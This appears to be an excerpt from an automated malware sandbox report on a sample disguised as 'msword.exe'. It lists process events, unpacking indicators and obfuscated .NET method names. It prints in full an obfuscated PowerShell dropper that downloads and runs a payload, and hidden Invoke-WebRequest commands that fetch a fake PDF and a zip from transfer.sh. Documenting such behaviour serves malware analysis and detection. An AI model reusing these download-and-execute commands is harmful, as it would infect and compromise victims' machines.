Source: 30.2.msword.exe.17fd2eb0000.1.raw.unpack, AhT96k9dDzjijSE8trywFkmBtNFcq2aTcE8Zsr2k.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{k9oflN72PIwhuwmzROmTtp56zF[2],_5mxApoJhgBT3F8fxU6U0Ho1e8369aU5P5OSst2rb0PPD8xhIuddLllo0ET.vTq2vhZVED4CV1a59houBtVgBzUSXDYpO53HaM0mLOQ7Qo9dWwcwsdGZrSFT7LRDTcfVbdgea1QNxdK6hLKxRsF2WS(Convert.FromBase64String(k9oflN72PIwhuwmzROmTtp56zF[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 30.2.msword.exe.17fd2eb0000.1.raw.unpack, AhT96k9dDzjijSE8trywFkmBtNFcq2aTcE8Zsr2k.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { k9oflN72PIwhuwmzROmTtp56zF[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 17.2.msword.com.217627b0000.1.raw.unpack, AhT96k9dDzjijSE8trywFkmBtNFcq2aTcE8Zsr2k.cs.Net Code: P505pCN11lSWhnf9gHPksn10tlFBOrh0ECc9Va7Q System.AppDomain.Load(byte[])
Source: 17.2.msword.com.217627b0000.1.raw.unpack, AhT96k9dDzjijSE8trywFkmBtNFcq2aTcE8Zsr2k.cs.Net Code: _4QczP4XxMEJU0wVfVFWkO49fgR System.AppDomain.Load(byte[])
Source: 17.2.msword.com.217627b0000.1.raw.unpack, AhT96k9dDzjijSE8trywFkmBtNFcq2aTcE8Zsr2k.cs.Net Code: _4QczP4XxMEJU0wVfVFWkO49fgR
Source: 30.2.msword.exe.17fd2fbcdd8.2.raw.unpack, AhT96k9dDzjijSE8trywFkmBtNFcq2aTcE8Zsr2k.cs.Net Code: P505pCN11lSWhnf9gHPksn10tlFBOrh0ECc9Va7Q System.AppDomain.Load(byte[])
Source: 30.2.msword.exe.17fd2fbcdd8.2.raw.unpack, AhT96k9dDzjijSE8trywFkmBtNFcq2aTcE8Zsr2k.cs.Net Code: _4QczP4XxMEJU0wVfVFWkO49fgR System.AppDomain.Load(byte[])
Source: 30.2.msword.exe.17fd2fbcdd8.2.raw.unpack, AhT96k9dDzjijSE8trywFkmBtNFcq2aTcE8Zsr2k.cs.Net Code: _4QczP4XxMEJU0wVfVFWkO49fgR
Source: 30.2.msword.exe.17fd2eb0000.1.raw.unpack, AhT96k9dDzjijSE8trywFkmBtNFcq2aTcE8Zsr2k.cs.Net Code: P505pCN11lSWhnf9gHPksn10tlFBOrh0ECc9Va7Q System.AppDomain.Load(byte[])
Source: 30.2.msword.exe.17fd2eb0000.1.raw.unpack, AhT96k9dDzjijSE8trywFkmBtNFcq2aTcE8Zsr2k.cs.Net Code: _4QczP4XxMEJU0wVfVFWkO49fgR System.AppDomain.Load(byte[])
Source: 30.2.msword.exe.17fd2eb0000.1.raw.unpack, AhT96k9dDzjijSE8trywFkmBtNFcq2aTcE8Zsr2k.cs.Net Code: _4QczP4XxMEJU0wVfVFWkO49fgR
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function dOsMYLz($spuPzwqNIGoc, $gPWqZKDq){[IO.File]::WriteAllBytes($spuPzwqNIGoc, $gPWqZKDq)};function JCJwvhfzgHefb($spuPzwqNIGoc){if($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73259,73267,73267))) -eq $True){rundll32.exe $spuPzwqNIGoc }elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73271,73274,73208))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $spuPzwqNIGoc}elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73268,73274,73264))) -eq $True){misexec /qn /i $spuPzwqNIGoc}else{Start-Process $spuPzwqNIGoc}};function pXGYSCUVqpfxTRQrgAb($IBxPjApNcwY){$otXYsHsHocLFsKHrQ = New-Object (jzmpkwatkOQYW @(73237,73260,73275,73205,73246,73260,73257,73226,73267,73264,73260,73269,73275));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$gPWqZKDq = $otXYsHsHocLFsKHrQ.DownloadData($IBxPjApNcwY);return $gPWqZKDq};function jzmpkwatkOQYW($eJBDNpQVr){$HWXdorZRBma=73159;$uZIzYLzxw=$Null;foreach($FFcJYiTuVaDHDA in $eJBDNpQVr){$uZIzYLzxw+=[char]($FFcJYiTuVaDHDA-$HWXdorZRBma)};return $uZIzYLzxw};function AVkLnTga(){$IVRWFACeCqTYmC = $env:AppData + '\';$QjsurCf = $IVRWFACeCqTYmC + 'c.bat'; if (Test-Path -Path $QjsurCf){JCJwvhfzgHefb $QjsurCf;}Else{ $pPDhkszgZpHK = pXGYSCUVqpfxTRQrgAb (jzmpkwatkOQYW @(73263,73275,73275,73271,73274,73217,73206,73206,73275,73273,73256,73269,73274,73261,73260,73273,73205,73274,73263,73206,73262,73260,73275,73206,73248,73272,73235,73235,73259,73224,73234,73247,73280,73232,73206,73258,73205,73257,73256,73275));dOsMYLz $QjsurCf $pPDhkszgZpHK;JCJwvhfzgHefb $QjsurCf;};;;;}AVkLnTga;
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://transfer.sh/get/fHMB2lI9W3/W2.pdf -OutFile C:\Users\user\AppData\Local\Temp\W2.pdf"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://transfer.sh/get/WD631pf02G/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function dOsMYLz($spuPzwqNIGoc, $gPWqZKDq){[IO.File]::WriteAllBytes($spuPzwqNIGoc, $gPWqZKDq)};function JCJwvhfzgHefb($spuPzwqNIGoc){if($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73259,73267,73267))) -eq $True){rundll32.exe $spuPzwqNIGoc }elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73271,73274,73208))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $spuPzwqNIGoc}elseif($spuPzwqNIGoc.EndsWith((jzmpkwatkOQYW @(73205,73268,73274,73264))) -eq $True){misexec /qn /i $spuPzwqNIGoc}else{Start-Process $spuPzwqNIGoc}};function pXGYSCUVqpfxTRQrgAb($IBxPjApNcwY){$otXYsHsHocLFsKHrQ = New-Object (jzmpkwatkOQYW @(73237,73260,73275,73205,73246,73260,73257,73226,73267,73264,73260,73269,73275));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$gPWqZKDq = $otXYsHsHocLFsKHrQ.DownloadData($IBxPjApNcwY);return $gPWqZKDq};function jzmpkwatkOQYW($eJBDNpQVr){$HWXdorZRBma=73159;$uZIzYLzxw=$Null;foreach($FFcJYiTuVaDHDA in $eJBDNpQVr){$uZIzYLzxw+=[char]($FFcJYiTuVaDHDA-$HWXdorZRBma)};return $uZIzYLzxw};function AVkLnTga(){$IVRWFACeCqTYmC = $env:AppData + '\';$QjsurCf = $IVRWFACeCqTYmC + 'c.bat'; if (Test-Path -Path $QjsurCf){JCJwvhfzgHefb $QjsurCf;}Else{ $pPDhkszgZpHK = pXGYSCUVqpfxTRQrgAb (jzmpkwatkOQYW @(73263,73275,73275,73271,73274,73217,73206,73206,73275,73273,73256,73269,73274,73261,73260,73273,73205,73274,73263,73206,73262,73260,73275,73206,73248,73272,73235,73235,73259,73224,73234,73247,73280,73232,73206,73258,73205,73257,73256,73275));dOsMYLz $QjsurCf $pPDhkszgZpHK;JCJwvhfzgHefb $QjsurCf;};;;;}AVkLnTga;Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://transfer.sh/get/fHMB2lI9W3/W2.pdf -OutFile C:\Users\user\AppData\Local\Temp\W2.pdf"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://transfer.sh/get/WD631pf02G/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"Jump to behavior
Source: msword.com.11.drStatic PE information: section name: .symtab
Source: msword.exe.17.drStatic PE information: section name: .symtab
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00ED106F pushfq ; ret 17_2_00ED1070
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00ED11A9 push rdi; retn 000Eh17_2_00ED11B5
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comCode function: 17_2_00007FFD997B7EA5 push ecx; iretd 17_2_00007FFD997B7EAC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD997D2316 push 8B485F94h; iretd 18_2_00007FFD997D231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFD995FD2A5 pushad ; iretd 21_2_00007FFD995FD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFD997E2316 push 8B485F93h; iretd 21_2_00007FFD997E231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFD995FD2A5 pushad ; iretd 23_2_00007FFD995FD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 23_2_00007FFD997E2316 push 8B485F93h; iretd 23_2_00007FFD997E231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FFD9960D2A5 pushad ; iretd 25_2_00007FFD9960D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FFD99723875 pushad ; iretd 25_2_00007FFD997238A1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_00007FFD997F2316 push 8B485F92h; iretd 25_2_00007FFD997F231B
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D5106F pushfq ; ret 30_2_00D51070
Source: C:\Users\user\AppData\Roaming\msword.exeCode function: 30_2_00D511A9 push rdi; retn 000Eh30_2_00D511B5
Source: 17.2.msword.com.217627b0000.1.raw.unpack, HF1cn3oBFDjIf9Ucsywh6a5iI8V0pozpwe3RAgXqiO9wnyCDKb6GN2mg6NPNzne98o.csHigh entropy of concatenated method names: 'qyZ3CE7hVVJtSO5aY1J8cbwaIN0MohakF8a5e8BirUe81SYq09sRwRZlFVftfZyNKGdFWkIlXdAtG3ooQbhIlwwfov97h', 'IKsjzKlkT9eYAuezAgCLNvSrxFt7tDXX0F0BQYBOoREfOBU6h9ZvyI5RWRLgutHT1weDErbFRnewZo4iOva4rwmGkEMA8', 'PYBgJqAj042EQcpCoGjCqHbYCV6UmUXhZups9Vh4WWNu7MQS2ngpY21cbLt6ZuGQX7J23nTu1f53230baKK81vxmcyTfd', 'tsNF8bvU09aPIX5UCTFTxy8FRwZu5T07Jyx4pNpEq4qaGhsBfWO40wfhTewjmmamkRqzTNPvsSUEVPJCLI6DN8pIHP5Qn'
Source: 17.2.msword.com.217627b0000.1.raw.unpack, fiXbb6qxSDfJSJW89nNh911NffhUuhLKAwbl3dP2J1OIzEBUf5Ug7cjbzCtXDs7EfJmLolcXjv3yfawPyRFLQSCi4t.csHigh entropy of concatenated method names: 'Vhhl4B4pgI3r6xkvow9zxZ98z8ygFJVfY6dWcwS6CtLrnnlVh68JpCPwsqnTFuhTjosJgcrYdOwhMAQDwgbr78fo0J', '_8p8IR2QOMYSzVVEMkJjwfJNLdZpV27W2gojpCalPmvExGjjufRFKRwV0CJKkhfrkk1zA16EbyCrq', 'zygF5aq0vk4qT0xtB2oiKDQKpDUUavZDsOt818ORmJCPbHRDJgTWyMSgEQcaL4LT5vGGsDPbZQrs', 'U0hye4Hi6F18fVFBfMjdGp6aXfupDfvRc6518JvqZGPtApTAetOYr', 'S993i8J4XlitM73FpIiuhDJ5zQbluxlqOVKk6QSvwpoUPjNnhk3JE', 'HCTo97ycrneNb88dqwqWiqNjFznvbmGochhWjMvLZshvvbOWnbNcV', 'bneYGi6IZYEJb0N43ktcnaOzFrZB1H5td1GTTGyah9Mjjf8VNBHW9', '_0uwgQVyJ1PPp4nEew1WaQMGpmNCLJKCGtIlpyp3CZ14PbYl5STF1h', 'Haqwdws7E6bDKLgY6LiRJr9YanE8OfjwPuVzZCKhHGAj9ZDOZfDI8', 'x8deMnzz0czUMDJq6W2lmeD3X51YoneSAaH1Pahqur5sAMjVS8Lbn'
Source: 17.2.msword.com.217627b0000.1.raw.unpack, JzG6cq6Fw4ycgPnrgr5ZkfXJSNRpnzKeJ7h9sesNJjccm0xuHnyVojDBptZw6Isx2J.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'drKSSLqgIMzcJtsjxWTyA6GMI7Ja5vUlMlDKhwdTsSdYQempavarhIE4AkEfwPAzNU9ex0c0tCQWaPMXJRkLl5GGvgfbS', 'q2bBc989rQkYix2KWrhaBiuAxNgvhmbWlj2TK9HTajVuTAdQNCGNaDOcS3fiBsievrr8ek17Q0cylmzilUfFXx3McArg0', 'fktyHA6lIj6pVKL9xjWKvMCYCFrMEiYQzwWPPxFFu9zyPG5nlFJbxsyZcPZRg3zLu20BwyYx3hUlo3EePD6pzx6sHwmNm', 'OYfLr5OYXwtCqz1urV6RFlSQCT4doiXaRCQquPCukiOuYcN3Aey1CmkL4IjFgw8KkmgYE2zSNHu3Hq6JLR5GpGsv1lAHT'
Source: 17.2.msword.com.217627b0000.1.raw.unpack, 5mxApoJhgBT3F8fxU6U0Ho1e8369aU5P5OSst2rb0PPD8xhIuddLllo0ET.csHigh entropy of concatenated method names: 'WPQARxRKv0JSvJxITVtYFuxriVqyiHmjBWDeft3tdb23RDer7C298YNFri', 'JxlbcjmQlJCScW9eTkqgzU2x4z0zT6fYv6Tjh9ILPyhNxUT5X4ORblzL79', 'Kg7SM6J4ttibMB2AJHfs1n1gkh6rvarY3IDTUt2Ei2L5OfwcZTTwNQo0t1', 'fjfNPZQRmPcdmBQ7axA8IqpKyib92WqBQD3WUgm4eQmwrfGvEAXnZCuZDF', 'FxBxHsDnOic82qq88h5QDQt8agiCuMnk8tITR8nYj2OMaDiSrjrbrrXGPdPR6mLqk52xnlW1Jn8j0XAhNSbsQMQ5kJ', 'YmTV8e8EHjyBfUndeTD6wm8AWaS7hwPh5vZzuqKlcqOpglYQFvvpM2BIQpEWCAIrR4ebK1C2QSBKLTghLDoKNQ5Wtk', 'ax7nATg4XO48Gg7vDaxRrQRvwAxIasksMYytTOkjmmUDV75KEqVrCk9O8Ggm5rZH97uEo7xvWic8B1HxCYwkm0amTw', 'nsZfYwroJtZO7QpgP5pJL6aCQoLTmOwOyFIV8cSMAUmIAncWt8xdNMS8IXuWn3vemJWbmtVajybpEOShx7uFtcLzGh', 'dGIm1Ey6zZBqreKxQEDnRl0dlL1YgHPFyRG1TV71NJ1g3MUit2YOZOIXJwUqTOzNqYoGCBZndjq9gYANdGDF0uuhJa', '_2q4mu1lT8xp06kUcc3O1AOjHPEcUjB449CtN1nbCcvEDUI1LryskD6Q6C5PGz9YKxZ0rDPiZyIpJ7ZewnGlzScZQuq'
Source: 17.2.msword.com.217627b0000.1.raw.unpack, jK7sv5002wQ0ek2EAr2o3wDDr4zAqW3R8PWFXkbJnQ5bRJF2FaTd1HiqunhxNLSvUdXoUWshj0JKIvOrMSMX03PhbVGgcwKVlt.csHigh entropy of concatenated method names: 'aDuXyAG8aQdkmCKKcoSTDaQkSh3Lr9FW1mndJAMiWmdnCD3bXprWowpsyYpgl7E0fGCoHdU6Pgu6zBCFOUyW1b1wmnKdrZOXx2', 'c5hjhE8YclmwANlIaxPmdgQdXiZ8qP6wF8bgkTUCjJuUfQwlIrP0Pak1T03vdavsEQG2osMRiQJR4rr5XYu4rZG3NxCV1a7YbI', 'CoWg7aPAgVrl2FVw5Syl3brvLcotyljlHmU91gF7YnE0boVu5dkVAZbMw01X06tXpzGyIpVckzBVSbyVIOiwf20AO8DnIdsVNY', 'e0PYBydFMt8DnephhR4vus0GGJRu1e8zUnbnvZjfHJ3kOiwBh7iBJMQRVFLVtqn9Ug0vE6uffiJueOBXEptcThKOKxTNhce2tr', 'Zbn2IuXmau0snpGGqEaeoVlQJerE96ZcMIW1rdmGRJHbhVBDO44Q7u6BbTrbuhxk4vBjBLtHKaZYKrlsXt8syS46d7U8Ve7J8j', 'xu5wzjLZxBCMUkbcxp5yOAxqFGy08IQlSVRBlokqGfoaginc1IGs4R8LVfl4p13LuZtRVGAhqR0vZ5JJc8ONthFlA8HcNISDue', 'ybLQfT2E1hjmYQ0uuyDhzc88OgyoTwgghSRDfaFF4OTFHkDRNLgnGfIRgHojcmuYV7YFxZOfYCuGcKQzq8a96FHRJq5AXNZe9b', 'AwIRfUYTARcqi15uLXUMkaPscqhpaFhtAg6gxwDBfSHzwxnobRpLyAHn0QEVYjP3QboUu1VNb61rv0LWBhIiqF78abwL2YriTQ', 'XEDoxDfOqrBSibfLZSZ8urEWWZbiyGOGuvByjJckTqU9vyMG5dpGdqOF30ivMGsrCmsYHCA2ZxIIV4GuGPtvGB3DEHxQxYC1ki', 'tQ9Lx2Mu4k8YNXyBvLLrIqUqeMAsxNFtIWgZf6q8ikYwTzkSisJkJrnIpkjFKcAoSngpjfFpm3dZZknEHcYNvqv9ycLuXLUOJR'
Source: 17.2.msword.com.217627b0000.1.raw.unpack, AhT96k9dDzjijSE8trywFkmBtNFcq2aTcE8Zsr2k.csHigh entropy of concatenated method names: 'vXdf9ZPrvXFWYv2hxRTtS7AEXTJ9svcN0eoh4hc0', 'P505pCN11lSWhnf9gHPksn10tlFBOrh0ECc9Va7Q', '_6bY2mlnFaDa8LwvoEjU23KDxigGMfDv0nszHIPbU', 'YJBjj4okhK13xcRLrNFQDmsKxBnN8joceqAP7wHC', 'z4p8DS4ndL0xeKTmqjq7Q8vXHZ2t8T4uEeN3PNZD', 'vICaiqgh6677uEdpdQIXVaadQfN2LO5HZUOvHXDB', '_6mrt0Qlvq2dbP8rDVSimAk4YCOhdGT5cdFvO0lM1', 'TMZys9XTxWUHNZI06Gsmlc3ukmkJZfuGGpkzNXjg', 'zoTxfTebRVp4vNGfjlxjGZ5gau', 'sUDtYB42h3OD6FHvkTg4MYobAp'
Source: 17.2.msword.com.217627b0000.1.raw.unpack, uZTleKS4UURYcsq7mO9baxmplLW1iTvON57H4pxXBvSyFchTtcNVpsJ0sd.csHigh entropy of concatenated method names: 'dE7eNZjPCKSFbJ4L1s9Tcj1QqcEXzfRpzHaeCIJ8HET8uLJEB7zqN3jzEt', 'x48mzhDKmz4eFFGvdvBrpqSCFy4BMU9t29jxbPz2gUhYS4PYNC6d8', 'I9OFs2D76FeDIO8LDzmWrArLFzVX22sN545Bzhf0PoNhYCJriihKW', 'jc8HGdJiIGW9oPUUxhEe2i1jWXYCDlr0Mjn0U82zFjt9Djm8axQFI', 'sJHbZaEfowbCVdpE4xO5QU9NzrfCdMjh5HmH8gjbfAMps8bdnDc2I'
Source: 17.2.msword.com.217627b0000.1.raw.unpack, 7gTDCf4xE7WmGxVMtz697rJgDE.csHigh entropy of concatenated method names: 'ZadOaNBcG4N4viyUpuOPSoqF8o', 'EwEHAMKgvfvedSSGQmctMAyVYv', '_627lHQUAfXsAJVEiUMZZMdwezd', 'o6fCujRw1jXK3Jm0hLG9F8RD56', 'lYSvDonlRcJyYu5sh2lATZ1jKa', 'g6qaK2qIBKEPcFTOZ7kEBk5Ei6', 'nQXhnNk4vf0A236w3ABpZ88Fp9', 'sNUH8I1ZijvkPdRDM2BGrtNInA', 's8ngsmu75Dlx6ZoGw16SCFgRda', 'kC1MhMZZz9NH2wf7jzC9O4V3tv'
Source: 17.2.msword.com.217627b0000.1.raw.unpack, GDIAnXTRSIb3FrAeKFF4FT1RGJoZkrNqr0qUx7gyE9Qg1MvFfwWHEjyFTQDyybvmlttzzBOFwfUM16Ttlz2BgYoVLdgdJ5SuKV.csHigh entropy of concatenated method names: 'lHZ0KWPr0B6Rl1tLxp8r8NxWhRQuPehrN7G4wTG9nB7QwU1XESom2uby56vljhbTTrHNHEpRlLoyYRfwNectzElZ7ii8n8C6My', 'smlfkwkCDIrZom9hvPNdXvonH9YEubaQk1DyBUD7Ty4w2JG7D0fuFzHxx6Ps6LsrI7hfDYNaPUbZl5gTixIldUelAwdUAnmsEI', 'qdpYDELZuNOUfTgqhiHsFuyBxbHzKe4bAzCvVuhMBoR5VvL4ikL2NC1aU5anS6jr2pLHflYHHSfxojf9HfWuJ4EHsg1OhjmDFf', '_0lZNePy9Tbtc0yjcn32MlP7oxilKr2EnkMwxhoz5ykB1zLu8PAarnMAB10BMhIQLCiLHGvqnIypudeffo8blVS7ZHCjFdizOIQ', 'yEzci1XE3GEDSibDpnNa93tYueTNBXm1VrWkjqc97frIgTZDb3xod7s91jiWdpV9yA4nYUz7SWjHf4iWGttq3zgRtUq4IQEI8k', 'jygpotUgp9pzTZzzT4sKWeOLmca9kOdLNrUq2lrw4zeFOATR8COp2NSrvDhhrSZpBwxbaleowP7TdNEeCrMfbFzKgphDT', 'HeBtxARF0Rs2eAjLnwxbyin4fwm5qywmfduOdHWnds5kEpdFtzKN0cH6RXlPMX0yEqxARwOUMok9ldrAwnmuDRp8hLF4t', 'BcA4qEdHtphTwJZQYzoBw90Hy9OPw8E0Ktkm1sCtnwgDKf6vfvMo4ta7K4OioXUBhTi054oohY9C2HuZGMCDv7k17hZu7', 'M7aenwjHjk9JiJDczc7BjdJH2n6DgPcomBr4Lf2Pc30huX7VoXL72R1MZ11fMwp5lPonLwar23SiwDURtmdTwUTaatRQF', '_8JSTjQVi8sVubpzYHGcHffTzfAeU9qXzi2gYJpGof8yaEkoR4b1m3AY9mWYuG4ciFEVwE9aQmTk6Hpt8VDMCWxdxuGu4R'
Source: 17.2.msword.com.217627b0000.1.raw.unpack, Loz4LoeB21CBWtx3CqnXcyrEpn.csHigh entropy of concatenated method names: 'HFpEuaVwFNNBS8xfELBfV1Z81B', 'V5Uar9TpEWsg2gsgrjDRZnDPimINTpaIsZOFWDvS8sriqP93gUzFZ', 'VL4RaxpTZkb7djsGiwyWNYHreCpC6MIliT90CRzFwG689jdOrYR7v', 'gBaTReFqFXmnUzMVEtEIorCRxolhx0jKqP8g0pveWIXu929qV5x8l', 'F490LaDZbfMNJ5f76e5iAaIKAIo7A1L3GDhDdljNVpAoJK34vSHQp'
Source: 30.2.msword.exe.17fd2fbcdd8.2.raw.unpack, HF1cn3oBFDjIf9Ucsywh6a5iI8V0pozpwe3RAgXqiO9wnyCDKb6GN2mg6NPNzne98o.csHigh entropy of concatenated method names: 'qyZ3CE7hVVJtSO5aY1J8cbwaIN0MohakF8a5e8BirUe81SYq09sRwRZlFVftfZyNKGdFWkIlXdAtG3ooQbhIlwwfov97h', 'IKsjzKlkT9eYAuezAgCLNvSrxFt7tDXX0F0BQYBOoREfOBU6h9ZvyI5RWRLgutHT1weDErbFRnewZo4iOva4rwmGkEMA8', 'PYBgJqAj042EQcpCoGjCqHbYCV6UmUXhZups9Vh4WWNu7MQS2ngpY21cbLt6ZuGQX7J23nTu1f53230baKK81vxmcyTfd', 'tsNF8bvU09aPIX5UCTFTxy8FRwZu5T07Jyx4pNpEq4qaGhsBfWO40wfhTewjmmamkRqzTNPvsSUEVPJCLI6DN8pIHP5Qn'
Source: 30.2.msword.exe.17fd2fbcdd8.2.raw.unpack, fiXbb6qxSDfJSJW89nNh911NffhUuhLKAwbl3dP2J1OIzEBUf5Ug7cjbzCtXDs7EfJmLolcXjv3yfawPyRFLQSCi4t.csHigh entropy of concatenated method names: 'Vhhl4B4pgI3r6xkvow9zxZ98z8ygFJVfY6dWcwS6CtLrnnlVh68JpCPwsqnTFuhTjosJgcrYdOwhMAQDwgbr78fo0J', '_8p8IR2QOMYSzVVEMkJjwfJNLdZpV27W2gojpCalPmvExGjjufRFKRwV0CJKkhfrkk1zA16EbyCrq', 'zygF5aq0vk4qT0xtB2oiKDQKpDUUavZDsOt818ORmJCPbHRDJgTWyMSgEQcaL4LT5vGGsDPbZQrs', 'U0hye4Hi6F18fVFBfMjdGp6aXfupDfvRc6518JvqZGPtApTAetOYr', 'S993i8J4XlitM73FpIiuhDJ5zQbluxlqOVKk6QSvwpoUPjNnhk3JE', 'HCTo97ycrneNb88dqwqWiqNjFznvbmGochhWjMvLZshvvbOWnbNcV', 'bneYGi6IZYEJb0N43ktcnaOzFrZB1H5td1GTTGyah9Mjjf8VNBHW9', '_0uwgQVyJ1PPp4nEew1WaQMGpmNCLJKCGtIlpyp3CZ14PbYl5STF1h', 'Haqwdws7E6bDKLgY6LiRJr9YanE8OfjwPuVzZCKhHGAj9ZDOZfDI8', 'x8deMnzz0czUMDJq6W2lmeD3X51YoneSAaH1Pahqur5sAMjVS8Lbn'
Source: 30.2.msword.exe.17fd2fbcdd8.2.raw.unpack, JzG6cq6Fw4ycgPnrgr5ZkfXJSNRpnzKeJ7h9sesNJjccm0xuHnyVojDBptZw6Isx2J.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'drKSSLqgIMzcJtsjxWTyA6GMI7Ja5vUlMlDKhwdTsSdYQempavarhIE4AkEfwPAzNU9ex0c0tCQWaPMXJRkLl5GGvgfbS', 'q2bBc989rQkYix2KWrhaBiuAxNgvhmbWlj2TK9HTajVuTAdQNCGNaDOcS3fiBsievrr8ek17Q0cylmzilUfFXx3McArg0', 'fktyHA6lIj6pVKL9xjWKvMCYCFrMEiYQzwWPPxFFu9zyPG5nlFJbxsyZcPZRg3zLu20BwyYx3hUlo3EePD6pzx6sHwmNm', 'OYfLr5OYXwtCqz1urV6RFlSQCT4doiXaRCQquPCukiOuYcN3Aey1CmkL4IjFgw8KkmgYE2zSNHu3Hq6JLR5GpGsv1lAHT'
Source: 30.2.msword.exe.17fd2fbcdd8.2.raw.unpack, 5mxApoJhgBT3F8fxU6U0Ho1e8369aU5P5OSst2rb0PPD8xhIuddLllo0ET.csHigh entropy of concatenated method names: 'WPQARxRKv0JSvJxITVtYFuxriVqyiHmjBWDeft3tdb23RDer7C298YNFri', 'JxlbcjmQlJCScW9eTkqgzU2x4z0zT6fYv6Tjh9ILPyhNxUT5X4ORblzL79', 'Kg7SM6J4ttibMB2AJHfs1n1gkh6rvarY3IDTUt2Ei2L5OfwcZTTwNQo0t1', 'fjfNPZQRmPcdmBQ7axA8IqpKyib92WqBQD3WUgm4eQmwrfGvEAXnZCuZDF', 'FxBxHsDnOic82qq88h5QDQt8agiCuMnk8tITR8nYj2OMaDiSrjrbrrXGPdPR6mLqk52xnlW1Jn8j0XAhNSbsQMQ5kJ', 'YmTV8e8EHjyBfUndeTD6wm8AWaS7hwPh5vZzuqKlcqOpglYQFvvpM2BIQpEWCAIrR4ebK1C2QSBKLTghLDoKNQ5Wtk', 'ax7nATg4XO48Gg7vDaxRrQRvwAxIasksMYytTOkjmmUDV75KEqVrCk9O8Ggm5rZH97uEo7xvWic8B1HxCYwkm0amTw', 'nsZfYwroJtZO7QpgP5pJL6aCQoLTmOwOyFIV8cSMAUmIAncWt8xdNMS8IXuWn3vemJWbmtVajybpEOShx7uFtcLzGh', 'dGIm1Ey6zZBqreKxQEDnRl0dlL1YgHPFyRG1TV71NJ1g3MUit2YOZOIXJwUqTOzNqYoGCBZndjq9gYANdGDF0uuhJa', '_2q4mu1lT8xp06kUcc3O1AOjHPEcUjB449CtN1nbCcvEDUI1LryskD6Q6C5PGz9YKxZ0rDPiZyIpJ7ZewnGlzScZQuq'
